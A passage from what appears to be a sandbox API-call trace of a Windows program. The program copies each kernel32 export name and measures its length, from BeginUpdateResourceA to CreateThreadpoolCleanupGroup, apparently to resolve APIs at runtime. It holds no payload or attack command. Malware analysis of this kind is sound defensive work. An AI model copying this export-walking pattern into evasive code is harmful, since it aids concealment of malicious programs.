(lpString="BEGINUPDATERESOURCEA") returned 20 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.389] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.389] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.389] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.389] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.389] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.389] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.389] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.389] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.389] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.389] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.389] lstrlenA (lpString="CANCELIO") returned 8 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.389] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.389] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.389] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.389] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.389] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.389] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.390] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.390] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.390] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.390] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.390] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.390] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.390] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.390] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.390] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.390] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.390] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.390] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.390] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.390] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.390] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.390] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.390] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.390] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.391] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.391] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.391] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.391] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.391] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.391] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.391] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.391] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.391] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.391] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.391] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.391] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.391] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.391] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.391] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.391] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.391] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.391] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.391] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.392] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.392] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.392] lstrlenA (lpString="COPYFILEA") returned 9 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.392] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.392] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.392] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.392] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.392] lstrlenA (lpString="COPYFILEW") returned 9 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.392] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.392] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.392] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.392] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.392] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.392] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.392] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.392] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.392] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.392] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.393] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.393] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.393] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.393] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.393] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.393] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.393] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.393] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.393] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.393] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.393] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.393] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.393] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.393] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.393] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.393] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.393] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.393] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.394] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.394] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.394] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.394] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.394] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.394] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.394] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.394] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.394] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.394] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.394] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.394] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.394] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.394] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.394] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.394] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.394] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.394] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.394] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.395] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.395] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.395] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.395] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.395] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.395] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.395] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.395] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.395] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.395] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.395] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.395] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.395] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.395] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.395] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.395] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.395] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.395] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.396] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, 